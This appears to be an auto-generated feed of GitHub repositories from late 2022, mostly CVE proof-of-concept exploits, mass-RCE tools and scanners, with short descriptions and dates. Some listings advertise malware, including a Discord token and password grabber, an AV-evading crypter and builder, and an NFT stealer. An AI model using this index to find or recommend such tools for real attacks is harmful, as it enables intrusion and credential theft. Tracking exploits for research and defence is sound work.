**Cross Site Scripting in Teacher's Record Management System using CodeIgnitor** : [RashidKhanPathan/CVE-2022-41445](https://github.com/RashidKhanPathan/CVE-2022-41445) create time: 2022-11-03T09:06:39Z

**A project demonstrating an app that is vulnerable to Spring Security authorization bypass CVE-2022-31692** : [SpindleSec/cve-2022-31692-demo](https://github.com/SpindleSec/cve-2022-31692-demo) create time: 2022-11-03T08:35:20Z

**POC for LFI related to CVE-2021-27905** : [pdelteil/CVE-2021-27905.POC](https://github.com/pdelteil/CVE-2021-27905.POC) create time: 2022-11-03T00:41:16Z

**no description** : [Undefind404/cve_2021_41773](https://github.com/Undefind404/cve_2021_41773) create time: 2022-11-02T09:31:31Z

**CVE-2022-42889 Blind-RCE Nuclei Template** : [Hack4rLIFE/CVE-2022-42889](https://github.com/Hack4rLIFE/CVE-2022-42889) create time: 2022-11-02T21:49:55Z

**One day based on https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html** : [Bdenneu/CVE-2022-33079](https://github.com/Bdenneu/CVE-2022-33079) create time: 2022-11-02T18:38:01Z

**no description** : [rbowes-r7/cve-2022-3602-and-cve-2022-3786-openssl-poc](https://github.com/rbowes-r7/cve-2022-3602-and-cve-2022-3786-openssl-poc) create time: 2022-11-02T17:33:26Z

**Operational information regarding CVE-2022-3602 and CVE-2022-3786, two vulnerabilities in OpenSSL 3** : [NCSC-NL/OpenSSL-2022](https://github.com/NCSC-NL/OpenSSL-2022) create time: 2022-10-28T09:51:41Z

**POCsuite与goland实现华为HG532路由器命令注入CVE-2017-17215 POC** : [ltfafei/HuaWei_Route_HG532_RCE_CVE-2017-17215](https://github.com/ltfafei/HuaWei_Route_HG532_RCE_CVE-2017-17215) create time: 2022-11-02T14:07:08Z

**SpookySSL CVE-2022-3602 SSLv3 Scanner for Windows, Linux, macOS** : [alicangnll/SpookySSL-Scanner](https://github.com/alicangnll/SpookySSL-Scanner) create time: 2022-11-02T09:29:04Z

**no description** : [soy-oreocato/CVE-2022-42176](https://github.com/soy-oreocato/CVE-2022-42176) create time: 2022-11-02T01:39:49Z

**Simple bash script to automate the exploit of cve 2022 0739** : [Chris01s/CVE-2022-0739](https://github.com/Chris01s/CVE-2022-0739) create time: 2022-11-02T01:39:37Z

**cve-2022-3602 poc** : [attilaszia/cve-2022-3602](https://github.com/attilaszia/cve-2022-3602) create time: 2022-11-01T23:36:08Z

**SambaCry (CVE-2017-7494) exploit for Samba | bind shell without Metasploit** : [caique-garbim/CVE-2017-7494_SambaCry](https://github.com/caique-garbim/CVE-2017-7494_SambaCry) create time: 2022-11-01T23:17:25Z

**no description** : [eatscrayon/CVE-2022-3602-poc](https://github.com/eatscrayon/CVE-2022-3602-poc) create time: 2022-10-31T18:52:24Z

**no description** : [colmmacc/CVE-2022-3602](https://github.com/colmmacc/CVE-2022-3602) create time: 2022-10-30T23:32:56Z

**CVE-­2021­-1732 Microsoft Windows 10 本地提权漏 研究及Poc/Exploit开发** : [ratw/CVE-2021-1732](https://github.com/ratw/CVE-2021-1732) create time: 2022-11-01T13:06:17Z

**no description** : [lohith19/CVE-2022-3518](https://github.com/lohith19/CVE-2022-3518) create time: 2022-11-01T11:22:21Z

**python编写的apache路径穿越poc&exp** : [aqiao-jashell/py-CVE-2021-41773](https://github.com/aqiao-jashell/py-CVE-2021-41773) create time: 2022-11-01T09:17:03Z

**apache路径穿越漏洞poc&exp** : [aqiao-jashell/CVE-2021-41773](https://github.com/aqiao-jashell/CVE-2021-41773) create time: 2022-11-01T05:58:59Z

**Cross Site Scripting in Blood Donor Management System Using CodeIgniter - 1.0** : [RashidKhanPathan/CVE-2022-40470](https://github.com/RashidKhanPathan/CVE-2022-40470) create time: 2022-11-01T05:36:20Z

**no description** : [cckuailong/CVE-2022-40146_Exploit_Jar](https://github.com/cckuailong/CVE-2022-40146_Exploit_Jar) create time: 2022-11-01T03:41:36Z

**no description** : [privatenets/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/privatenets/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2022-10-31T22:08:05Z

**no description** : [roycewilliams/openssl-nov-1-critical-cve-2022-tracking](https://github.com/roycewilliams/openssl-nov-1-critical-cve-2022-tracking) create time: 2022-10-31T18:37:09Z

**KLiK-SocialMediaWebsite v1.0.1 has SQL Injection Vulnerabilities at profile.php** : [bypazs/CVE-2022-42098](https://github.com/bypazs/CVE-2022-42098) create time: 2022-09-28T09:19:53Z

**Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the comment.** : [bypazs/CVE-2022-42097](https://github.com/bypazs/CVE-2022-42097) create time: 2022-09-27T12:33:10Z

**Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Post content.** : [bypazs/CVE-2022-42096](https://github.com/bypazs/CVE-2022-42096) create time: 2022-09-27T12:28:13Z

**Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Card content.** : [bypazs/CVE-2022-42094](https://github.com/bypazs/CVE-2022-42094) create time: 2022-09-27T11:56:30Z

**{VMware Cloud Foundation} remote code execution vulnerability via XStream (CVE-2021-39144)** : [b3wT/CVE-2021-39144-XSTREAM-RCE](https://github.com/b3wT/CVE-2021-39144-XSTREAM-RCE) create time: 2022-10-31T10:27:35Z

**y the Way is an exploit that enables a root shell on Mikrotik devices running RouterOS versions:** : [babyshen/routeros-CVE-2018-14847-bytheway](https://github.com/babyshen/routeros-CVE-2018-14847-bytheway) create time: 2022-10-31T06:38:11Z

**Proof-of-Concept exploit (SQLI BookingPress before 1.0.11)** : [destr4ct/CVE-2022-0739](https://github.com/destr4ct/CVE-2022-0739) create time: 2022-10-30T19:32:15Z

**no description** : [jehovah2002/CVE-2021-4034-pwnkit](https://github.com/jehovah2002/CVE-2021-4034-pwnkit) create time: 2022-10-30T18:24:39Z

**Unauthenticated rce in sophos User Portal and Webadmin components mass exploitation tool** : [sml1nk/CVE-2022-3236-RCE](https://github.com/sml1nk/CVE-2022-3236-RCE) create time: 2022-10-30T18:09:58Z

**This repo provides a nice and easy way for linking an existing NFT smart contract to this minting dapp. There are two ways of using this repo, you can go the simple route or the more complex one. The simple route is so simple, all you need to do is download the build folder on the release page and change the configuration to fit your needs. (Follo** : [skylarcoolya/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft](https://github.com/skylarcoolya/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft) create time: 2022-10-29T18:58:51Z

**Unlimited Build Files Unlimited Spread Files Small File size Compatible with RATs, Keyloggers, Botnets, or any other exe Best Results on AV 0/35 Easy to use Exploit Builder** : [RydeinGG/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/RydeinGG/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2022-10-29T18:32:32Z

**Get system info (Version, CPU, GPU, RAM, IPs, BSSID, Location, Screen metrics, Installed apps) Chromium based browsers (passwords, credit cards, cookies, history, autofill, bookmarks) Firefox based browsers (db files, cookies, history, bookmarks) Internet explorer/Edge (passwords) Saved wifi networks & scan networks around device (SSID, BSSID) s** : [RydeinGG/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/RydeinGG/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2022-10-29T18:32:22Z

**POC for CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability.** : [Malwareman007/CVE-2022-21907](https://github.com/Malwareman007/CVE-2022-21907) create time: 2022-10-29T18:25:26Z

**Not the author of this script, reposting as original repo link is broken** : [itwestend/cve_2022_26134](https://github.com/itwestend/cve_2022_26134) create time: 2022-10-29T11:15:21Z

**Spring Cloud Gateway远程代码执行** : [savior-only/CVE-2022-22947](https://github.com/savior-only/CVE-2022-22947) create time: 2022-10-29T03:28:55Z

**Remote OS Command Injection in TastyIgniter v3.0.7 Sendmail Path field** : [HuskyHacks/CVE-2021-38817-Remote-OS-Command-Injection](https://github.com/HuskyHacks/CVE-2021-38817-Remote-OS-Command-Injection) create time: 2021-08-15T02:15:54Z

**Bitrix Vulnerability CVE-2022-43959** : [secware-ru/CVE-2022-43959](https://github.com/secware-ru/CVE-2022-43959) create time: 2022-10-28T08:52:17Z

**Omisión de autenticación utilizando una ruta o canal alternativa en el producto de Fortinet.** : [williamkhepri/CVE-2022-40687-metasploit-scanner](https://github.com/williamkhepri/CVE-2022-40687-metasploit-scanner) create time: 2022-10-28T08:53:12Z

**no description** : [an1p3lg5/CVE-2020-26233](https://github.com/an1p3lg5/CVE-2020-26233) create time: 2022-10-28T05:56:45Z

**no description** : [hughink/CVE-2022-40684](https://github.com/hughink/CVE-2022-40684) create time: 2022-10-28T03:46:00Z

**no description** : [cvelopers/COMP229-F2022-A2-CVEL](https://github.com/cvelopers/COMP229-F2022-A2-CVEL) create time: 2022-10-28T03:38:08Z

**no description** : [yonggui-li/CVE-2021-43890_poc](https://github.com/yonggui-li/CVE-2021-43890_poc) create time: 2022-10-28T01:46:51Z

**my extended take on Mark Brand's CVE 2016-3861 libutils bug** : [dropk1ck/CVE-2016-3861](https://github.com/dropk1ck/CVE-2016-3861) create time: 2019-12-21T15:11:19Z

**Exploit Fortigate - CVE-2022-40684** : [gustavorobertux/gotigate](https://github.com/gustavorobertux/gotigate) create time: 2022-10-27T17:30:08Z

**An authentication bypass using an alternate path or channel in Fortinet product** : [TaroballzChen/CVE-2022-40684-metasploit-scanner](https://github.com/TaroballzChen/CVE-2022-40684-metasploit-scanner) create time: 2022-10-27T15:11:27Z

**pdf_info <= 0.5.3 OS Command Injection** : [affix/CVE-2022-36231](https://github.com/affix/CVE-2022-36231) create time: 2022-10-26T14:51:57Z

**zVulnerabilityScanner Version 2022 / 2023 is the best CVE Scanner for Apache and Ngix** : [uFrenchDev/zVulnerabilityScanner-POC-Azuriom](https://github.com/uFrenchDev/zVulnerabilityScanner-POC-Azuriom) create time: 2022-10-26T11:10:50Z

**zVulnerabilityScanner Version 2022 / 2023. Is the best CVE Scanner for Apache and Ngix** : [uFrenchDev/zVulnerabilityScanner](https://github.com/uFrenchDev/zVulnerabilityScanner) create time: 2022-10-26T11:09:36Z

**PoC for a vulnerability that I found in Apple Shortcuts. Fixed in iOS 16.1 and macOS 13 Ventura.** : [iCMDgithub/CVE-2022-32938](https://github.com/iCMDgithub/CVE-2022-32938) create time: 2022-10-26T06:34:39Z

**no description** : [qingsiweisan/CVE-2022-40684](https://github.com/qingsiweisan/CVE-2022-40684) create time: 2022-10-26T01:48:14Z

**no description** : [k4u5h41/CVE-2007-2447](https://github.com/k4u5h41/CVE-2007-2447) create time: 2022-10-25T16:05:16Z

**no description** : [k4u5h41/CVE-2014-0160_Heartbleed](https://github.com/k4u5h41/CVE-2014-0160_Heartbleed) create time: 2022-04-24T11:53:16Z

**This script was created to automate addressing the vulnerability described in CVE-2021-26414 (https://support.microsoft.com/en-us/topic/kb5004442-manage-changes-for-windows-dcom-server-security-feature-bypass-cve-2021-26414-f1400b52-c141-43d2-941e-37ed901c769c), adds two regkeys under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\AppCompa** : [Nels2/dcom_10036_Solver](https://github.com/Nels2/dcom_10036_Solver) create time: 2022-10-25T15:24:03Z

**no description** : [EkamSinghWalia/-Detection-and-Mitigation-for-CVE-2022-1679](https://github.com/EkamSinghWalia/-Detection-and-Mitigation-for-CVE-2022-1679) create time: 2022-10-25T13:15:20Z

**no description** : [Vulnmachines/text4shell-CVE-2022-42889](https://github.com/Vulnmachines/text4shell-CVE-2022-42889) create time: 2022-10-25T13:11:24Z

**no description** : [EkamSinghWalia/Detection-and-Mitigation-for-CVE-2022-2639](https://github.com/EkamSinghWalia/Detection-and-Mitigation-for-CVE-2022-2639) create time: 2022-10-25T12:59:31Z

**cve-2021-43798 Grafana 8.3.0 - Directory Traversal and Arbitrary File Read** : [0bfxgh0st/cve-2021-43798](https://github.com/0bfxgh0st/cve-2021-43798) create time: 2022-10-25T12:24:02Z

**cURL one-liner to test for CVE-2022-1388 BIG-IP iControl REST RCE** : [OnCyberWar/CVE-2022-1388](https://github.com/OnCyberWar/CVE-2022-1388) create time: 2022-10-25T12:29:54Z

**cURL one-liner to test for CVE-2022-1388 BIG-IP iControl REST RCE** : [On-Cyber-War/CVE-2022-1388](https://github.com/On-Cyber-War/CVE-2022-1388) create time: 2022-10-25T12:15:31Z

**no description** : [jj4152/cve-2021-1675](https://github.com/jj4152/cve-2021-1675) create time: 2022-10-25T06:47:20Z

**CobaltStrike <= 4.7.1 RCE** : [its-arun/CVE-2022-39197](https://github.com/its-arun/CVE-2022-39197) create time: 2022-10-14T11:46:01Z

**no description** : [ELIZEUOPAIN/CVE-2019-9053-CMS-Made-Simple-2.2.10---SQL-Injection-Exploit](https://github.com/ELIZEUOPAIN/CVE-2019-9053-CMS-Made-Simple-2.2.10---SQL-Injection-Exploit) create time: 2022-10-25T00:55:12Z

**You can find a python script to exploit the vulnerability on Bitbucket related CVE-2022-36804.** : [khal4n1/CVE-2022-36804](https://github.com/khal4n1/CVE-2022-36804) create time: 2022-09-24T05:04:30Z

**no description** : [badboy-sft/CVE-2022-26134](https://github.com/badboy-sft/CVE-2022-26134) create time: 2022-10-24T19:00:25Z

**Text4Shell PoC Exploit** : [west-wind/CVE-2022-42889](https://github.com/west-wind/CVE-2022-42889) create time: 2022-10-24T15:28:02Z

**Stored Cross-site Scripting (XSS) in blog-post creation functionality in Amasty Blog Pro for Magento 2** : [afine-com/CVE-2022-35501](https://github.com/afine-com/CVE-2022-35501) create time: 2022-10-24T15:02:43Z

**Stored Cross-site Scripting (XSS) in leave comment functionality in Amasty Blog Pro for Magento 2** : [afine-com/CVE-2022-35500](https://github.com/afine-com/CVE-2022-35500) create time: 2022-10-24T14:52:41Z

**DrayTek unauthenticated remote code execution vulnerability (CVE-2022-32548) in /cgi-bin/wlogin.cgi via username field** : [uisvit/CVE-2022-32548-RCE-MASS](https://github.com/uisvit/CVE-2022-32548-RCE-MASS) create time: 2022-10-24T14:20:49Z

**Cross-site Scripting (XSS) in blog-post creation functionality in Amasty Blog Pro for Magento 2** : [afine-com/CVE-2022-36433](https://github.com/afine-com/CVE-2022-36433) create time: 2022-10-24T13:49:17Z

**Cross-site Scripting (XSS) in Preview functionality in Amasty Blog Pro for Magento 2** : [afine-com/CVE-2022-36432](https://github.com/afine-com/CVE-2022-36432) create time: 2022-10-24T13:36:09Z

**CVE-2018-6066 using VBA** : [DISREL/Ring0VBA](https://github.com/DISREL/Ring0VBA) create time: 2022-10-24T13:59:12Z

**ProxyNotShell(CVE-2022-41082/CVE-2022-41040) all analyze, mitigation script and a python wrapper to acieve RCE for Proxynotshell via EXCHANGE POWERSHELL are included inside.** : [vib3zz/CVE-2022-41082-RCE-POC](https://github.com/vib3zz/CVE-2022-41082-RCE-POC) create time: 2022-10-24T09:04:15Z

**no description** : [ReCryptLLC/CVE-2022-42045](https://github.com/ReCryptLLC/CVE-2022-42045) create time: 2022-10-23T15:58:18Z

**no description** : [WilsonFung414/CVE-2022-30190](https://github.com/WilsonFung414/CVE-2022-30190) create time: 2022-10-23T15:24:43Z

**CVE-2022-42889 aka Text4Shell research & PoC** : [cxzero/CVE-2022-42889-text4shell](https://github.com/cxzero/CVE-2022-42889-text4shell) create time: 2022-10-23T13:42:23Z

**Authenticated Vertical Privilege Escalation Vulnerability in Blood Donor Management Systm (BDMS)** : [RashidKhanPathan/CVE-2022-38813](https://github.com/RashidKhanPathan/CVE-2022-38813) create time: 2022-10-23T14:03:41Z

**Amanda 3.5.1 second LPE.** : [MaherAzzouzi/CVE-2022-37705](https://github.com/MaherAzzouzi/CVE-2022-37705) create time: 2022-10-23T11:48:36Z

**Amanda 3.5.1 LPE** : [MaherAzzouzi/CVE-2022-37704](https://github.com/MaherAzzouzi/CVE-2022-37704) create time: 2022-10-23T11:43:49Z

**Vulnerability Scanner for CVE-2022-42889 (Text4Shell)** : [smileostrich/Text4Shell-Scanner](https://github.com/smileostrich/Text4Shell-Scanner) create time: 2022-10-23T09:45:41Z

**A Database Server Docker build for CVE-2021-27928 & another project CVE-2021-40438** : [WilsonFung414/CVE-2021-27928_Docker](https://github.com/WilsonFung414/CVE-2021-27928_Docker) create time: 2022-10-23T06:31:12Z

**An Application Server Docker build for CVE-2021-40438** : [WilsonFung414/CVE-2021-40438_Docker](https://github.com/WilsonFung414/CVE-2021-40438_Docker) create time: 2022-10-23T05:20:27Z

**Apache Text4Shell (CVE-2022-42889) The affected Apache Commons Text versions 1.5 through 1.9 and it has been patched in version 1.10. Apache Commons Text is a Java library described as "a library focused on algorithms working on strings".** : [0xmaximus/Apache-Commons-Text---CVE-2022-42889](https://github.com/0xmaximus/Apache-Commons-Text---CVE-2022-42889) create time: 2022-10-23T08:33:02Z

**CVE-2014-8731 - PHPMemcachedAdmin RCE - Proof of Concept** : [sbani/CVE-2014-8731-PoC](https://github.com/sbani/CVE-2014-8731-PoC) create time: 2022-10-17T12:39:20Z

**A simple dockerize application that shows how to exploit the CVE-2022-42889 vulnerability.** : [akshayithape-devops/CVE-2022-42889-POC](https://github.com/akshayithape-devops/CVE-2022-42889-POC) create time: 2022-10-23T05:48:48Z

**Internal network scanner through Gluu IAM blind ssrf** : [Qeisi/CVE-2022-36663-PoC](https://github.com/Qeisi/CVE-2022-36663-PoC) create time: 2022-10-22T21:55:33Z

**writeup and PoC for (CVE-2022-41082/CVE-2022-41040) aka ProxyNotShell** : [stat1st1c/CVE-2022-41082-RCE-POC](https://github.com/stat1st1c/CVE-2022-41082-RCE-POC) create time: 2022-10-22T18:18:23Z

**CVE-2017-0785** : [sh4rknado/BlueBorn](https://github.com/sh4rknado/BlueBorn) create time: 2022-10-22T17:10:34Z

**A quick and easy POC for CVE-2020-15568** : [n0bugz/CVE-2020-15568](https://github.com/n0bugz/CVE-2020-15568) create time: 2022-10-22T17:20:01Z

**CVE-2022-42889-POC_TEXT4SHELL** : [jayaram-yalla/CVE-2022-42889-POC_TEXT4SHELL](https://github.com/jayaram-yalla/CVE-2022-42889-POC_TEXT4SHELL) create time: 2022-10-22T14:17:25Z

**CVE-2022-42889 Text4Shell Exploit POC** : [rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC](https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC) create time: 2022-10-22T10:30:41Z

**CVE-2022-39197 RCE POC** : [TheCryingGame/CVE-2022-39197-RCE](https://github.com/TheCryingGame/CVE-2022-39197-RCE) create time: 2022-10-22T10:11:37Z

**Dockerized PoC for CVE-2022-42889 Text4Shell** : [galoget/CVE-2022-42889-Text4Shell-Docker](https://github.com/galoget/CVE-2022-42889-Text4Shell-Docker) create time: 2022-10-22T10:01:13Z

**Dockerized PoC for CVE-2022-42889 Text4Shell** : [galoget/CVE-2022-42889-Text4Shell-Docker](https://github.com/galoget/CVE-2022-42889-Text4Shell-Docker) create time: 2022-10-22T08:47:21Z

**python script for CVE-2022-42889** : [s3l33/CVE-2022-42889](https://github.com/s3l33/CVE-2022-42889) create time: 2022-10-22T02:06:40Z

**no description** : [yonggui-li/CVE-2022-1000_poc](https://github.com/yonggui-li/CVE-2022-1000_poc) create time: 2022-10-21T03:23:07Z

**no description** : [trhacknon/CVE-2018-7600](https://github.com/trhacknon/CVE-2018-7600) create time: 2022-10-21T21:05:40Z

**no description** : [SecurityAndStuff/CVE-2022-2402](https://github.com/SecurityAndStuff/CVE-2022-2402) create time: 2022-10-21T19:10:44Z

**This project includes a python script which generates malicious commands leveraging CVE-2022-42889 vulnerability** : [stavrosgns/Text4ShellPayloads](https://github.com/stavrosgns/Text4ShellPayloads) create time: 2022-10-21T19:41:56Z

**Forti CVE-2022-40684 enumeration script built in Rust** : [Grapphy/fortipwn](https://github.com/Grapphy/fortipwn) create time: 2022-10-16T23:50:30Z

**no description** : [humbss/CVE-2022-42889](https://github.com/humbss/CVE-2022-42889) create time: 2022-10-21T13:48:04Z

**CVE 2022 40684** : [Bendalledj/CVE-2022-40684](https://github.com/Bendalledj/CVE-2022-40684) create time: 2022-10-21T08:07:53Z

**no description** : [lolminerxmrig/CVE-2022-22954_](https://github.com/lolminerxmrig/CVE-2022-22954_) create time: 2022-10-20T08:08:09Z

**no description** : [trhacknon/CVE-2022-41082-MASS-SCANNER](https://github.com/trhacknon/CVE-2022-41082-MASS-SCANNER) create time: 2022-10-20T22:22:48Z

**no description** : [trhacknon/CVE-2022-41040-metasploit-ProxyNotShell](https://github.com/trhacknon/CVE-2022-41040-metasploit-ProxyNotShell) create time: 2022-10-20T22:14:04Z

**no description** : [trhacknon/CVE-2022-29303-Exploit](https://github.com/trhacknon/CVE-2022-29303-Exploit) create time: 2022-10-20T21:05:28Z

**POC OF CVE-2022-21970** : [Malwareman007/CVE-2022-21970](https://github.com/Malwareman007/CVE-2022-21970) create time: 2022-10-20T20:55:28Z

**no description** : [trhacknon/CVE-2022-22947](https://github.com/trhacknon/CVE-2022-22947) create time: 2022-10-20T20:35:52Z

**Proof of Concept Appliction for testing CVE-2022-42889** : [securekomodo/text4shell-poc](https://github.com/securekomodo/text4shell-poc) create time: 2022-10-20T18:07:25Z

**Automated Exploit for CVE-2017-9841 (eval-stdin.php vulnerable file)** : [mileticluka1/eval-stdin](https://github.com/mileticluka1/eval-stdin) create time: 2022-10-20T19:05:12Z

**Esta herramienta te ayudará a buscar la versión apache de una página web y decirte si es vulnerable o no.** : [RIP-Network/cve-2022-42889-scanner](https://github.com/RIP-Network/cve-2022-42889-scanner) create time: 2022-10-20T18:37:16Z

**no description** : [mattysaints/CVE-2017-17485](https://github.com/mattysaints/CVE-2017-17485) create time: 2022-10-20T14:15:31Z

**通过 jvm 启动参数 以及 jps pid进行拦截非法参数** : [uk0/cve-2022-42889-intercept](https://github.com/uk0/cve-2022-42889-intercept) create time: 2022-10-20T13:05:24Z

**no description** : [backcr4t/CVE-2022-41082-MASS-RCE](https://github.com/backcr4t/CVE-2022-41082-MASS-RCE) create time: 2022-10-20T12:53:41Z

**the metasploit script(POC) about CVE-2022-41040. Microsoft Exchange are vulnerable to a server-side request forgery (SSRF) attack. An authenticated attacker can use the vulnerability to elevate privileges.** : [TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell](https://github.com/TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell) create time: 2022-10-20T03:11:03Z

**no description** : [trhacknon/CVE-2022-22954_](https://github.com/trhacknon/CVE-2022-22954_) create time: 2022-10-20T01:25:12Z

**no description** : [neerazz/CVE-2022-42889](https://github.com/neerazz/CVE-2022-42889) create time: 2022-10-19T22:56:12Z

**Exploit of College Website v1.0 CMS - SQL injection** : [lus33rr/CVE-2022-27414](https://github.com/lus33rr/CVE-2022-27414) create time: 2022-10-19T22:17:47Z

**Utilities for exploiting vulnerability CVE-2022-40684 (FortiOS / FortiProxy / FortiSwitchManager - Authentication bypass on administrative interface).** : [und3sc0n0c1d0/CVE-2022-40684](https://github.com/und3sc0n0c1d0/CVE-2022-40684) create time: 2022-10-19T22:07:24Z

**A fully automated, accurate, and extensive scanner for finding text4shell RCE CVE-2022-42889** : [securekomodo/text4shell-scan](https://github.com/securekomodo/text4shell-scan) create time: 2022-10-19T20:14:22Z

**no description** : [trhacknon/CVE-2022-40684](https://github.com/trhacknon/CVE-2022-40684) create time: 2022-10-19T19:51:33Z

**Another tool for exploiting CVE-2017-9248, a cryptographic weakness in Telerik UI for ASP.NET AJAX dialog handler.** : [blacklanternsecurity/dp_cryptomg](https://github.com/blacklanternsecurity/dp_cryptomg) create time: 2022-10-04T21:09:27Z

**no description** : [inj3ction/CVE-2017-7921-EXP](https://github.com/inj3ction/CVE-2017-7921-EXP) create time: 2022-10-19T13:48:49Z

**no description** : [onlyHerold22/CVE-2022-27925-PoC](https://github.com/onlyHerold22/CVE-2022-27925-PoC) create time: 2022-10-19T12:46:48Z

**Apache commons text - CVE-2022-42889 Text4Shell proof of concept exploit.** : [kljunowsky/CVE-2022-42889-text4shell](https://github.com/kljunowsky/CVE-2022-42889-text4shell) create time: 2022-10-19T11:49:08Z

**Exploit updated to use Python 3.** : [TheKickPuncher/CVE-2020-0688-Python3](https://github.com/TheKickPuncher/CVE-2020-0688-Python3) create time: 2022-10-19T10:36:10Z

**no description** : [nidhi7598/-expat_2.1.0_CVE-2022-40674](https://github.com/nidhi7598/-expat_2.1.0_CVE-2022-40674) create time: 2022-10-19T11:15:29Z

**no description** : [eunomie/cve-2022-42889-check](https://github.com/eunomie/cve-2022-42889-check) create time: 2022-10-19T06:54:57Z

**no description** : [iamsanjay/CVE-2022-42899](https://github.com/iamsanjay/CVE-2022-42899) create time: 2022-10-19T02:13:25Z

**A simple application that shows how to exploit the CVE-2022-42889 vulnerability** : [korteke/CVE-2022-42889-POC](https://github.com/korteke/CVE-2022-42889-POC) create time: 2022-10-18T23:15:40Z

**CVE-2022-42889 Remote Code Exection Vulnerability aka Text4Shell** : [Goss1TheDog/CVE-2022-42889-RCE-POC](https://github.com/Goss1TheDog/CVE-2022-42889-RCE-POC) create time: 2022-10-18T19:37:40Z

**CVE-2014-3704 aka Drupalgeddon - Form-Cache Injection Method** : [AleDiBen/Drupalgeddon](https://github.com/AleDiBen/Drupalgeddon) create time: 2022-10-18T16:00:17Z

**Apache Kylin有一个restful api会在没有任何认证的情况下暴露配置信息** : [kailing0220/CVE-2020-13937](https://github.com/kailing0220/CVE-2020-13937) create time: 2022-10-18T14:11:16Z

**cve-2022-42889 Text4Shell CVE-2022-42889 affects Apache Commons Text versions 1.5 through 1.9. It has been patched as of Commons Text version 1.10.** : [ClickCyber/cve-2022-42889](https://github.com/ClickCyber/cve-2022-42889) create time: 2022-10-18T13:53:55Z

**Dockerized POC for CVE-2022-42889 Text4Shell** : [karthikuj/cve-2022-42889-text4shell-docker](https://github.com/karthikuj/cve-2022-42889-text4shell-docker) create time: 2022-10-18T09:58:00Z

**ClusterImagePolicy demo for cve-2022-42889 text4shell** : [chainguard-dev/text4shell-policy](https://github.com/chainguard-dev/text4shell-policy) create time: 2022-10-17T21:49:13Z

**no description** : [Wh04m1001/CVE-2022-3368](https://github.com/Wh04m1001/CVE-2022-3368) create time: 2022-10-18T09:16:04Z

**An intentionally vulnerable webapp to get your hands dirty with CVE-2022-42889.** : [tulhan/commons-text-goat](https://github.com/tulhan/commons-text-goat) create time: 2022-10-18T08:22:55Z

**Exploit of RealVNC VNC Server** : [alirezac0/CVE-2022-27502](https://github.com/alirezac0/CVE-2022-27502) create time: 2022-10-18T06:31:21Z

**POC for CVE-2022-33980 (Apache Commons Configuration RCE vulnerability)** : [sammwyy/CVE-2022-33980-POC](https://github.com/sammwyy/CVE-2022-33980-POC) create time: 2022-10-17T21:39:03Z

**Proof of Concept for CVE-2022-42889** : [SeanWrightSec/CVE-2022-42889-PoC](https://github.com/SeanWrightSec/CVE-2022-42889-PoC) create time: 2022-10-17T18:50:36Z

**Proof of Concept for CVE-2022-42889** : [SeanWrightSec/CVE-2022-42889-PoC](https://github.com/SeanWrightSec/CVE-2022-42889-PoC) create time: 2022-10-17T18:42:53Z

**no description** : [jessica0f0116/cve_2022_21882-cve_2021_1732](https://github.com/jessica0f0116/cve_2022_21882-cve_2021_1732) create time: 2022-10-17T18:41:07Z

**Mass exploitation tool for CVE-2022-42889 (Apache Commons Text RCE) supports list of ips** : [pr0n3d/CVE-2022-42889-MASS-RCE](https://github.com/pr0n3d/CVE-2022-42889-MASS-RCE) create time: 2022-10-17T18:33:58Z

**CVE-2022-42889 sample application (Apache Commons Text RCE)** : [standb/CVE-2022-42889](https://github.com/standb/CVE-2022-42889) create time: 2022-10-17T16:07:50Z

**Exploit POC for CVE-2022-0824** : [pizza-power/golang-webmin-CVE-2022-0824-revshell](https://github.com/pizza-power/golang-webmin-CVE-2022-0824-revshell) create time: 2022-10-17T11:47:04Z

**vm2 sandbox remote code execution [mass adding] [payload send for botnets]** : [backcr4t/CVE-2022-36067-MASS-RCE](https://github.com/backcr4t/CVE-2022-36067-MASS-RCE) create time: 2022-10-17T10:44:31Z

**ProxyNotShell(CVE-2022-41082/CVE-2022-41040) all analyze, mitigation script and a python wrapper to acieve RCE for Proxynotshell** : [backcr4t/CVE-2022-41082-RCE](https://github.com/backcr4t/CVE-2022-41082-RCE) create time: 2022-10-17T09:55:06Z

**Ruby on Rails是一个 Web 应用程序框架,是一个相对较新的 Web 应用程序框架,构建在 Ruby 语言之上。这个漏洞主要是由于Ruby on Rails使用了指定参数的render file来渲染应用之外的视图,我们可以通过修改访问某控制器的请求包,通过“…/…/…/…/”来达到路径穿越的目的,然后再通过“{{”来进行模板查询路径的闭合,使得所要访问的文件被当做外部模板来解析。** : [kailing0220/CVE-2019-5418](https://github.com/kailing0220/CVE-2019-5418) create time: 2022-10-17T09:04:43Z

**no description** : [jsongmax/Fortinet-CVE-2022-40684](https://github.com/jsongmax/Fortinet-CVE-2022-40684) create time: 2022-10-17T09:22:57Z

**no description** : [puckiestyle/CVE-2022-40684](https://github.com/puckiestyle/CVE-2022-40684) create time: 2022-10-17T08:49:36Z

**CVE-2022-3236 Unauthenticated rce in sophos User Portal and Webadmin components mass exploitation tool** : [n0npro/CVE-2022-3236-MASS-RCE](https://github.com/n0npro/CVE-2022-3236-MASS-RCE) create time: 2022-10-17T08:27:48Z

**no description** : [jsongmax/terraMaster-CVE-2022-24990](https://github.com/jsongmax/terraMaster-CVE-2022-24990) create time: 2022-10-17T07:54:13Z

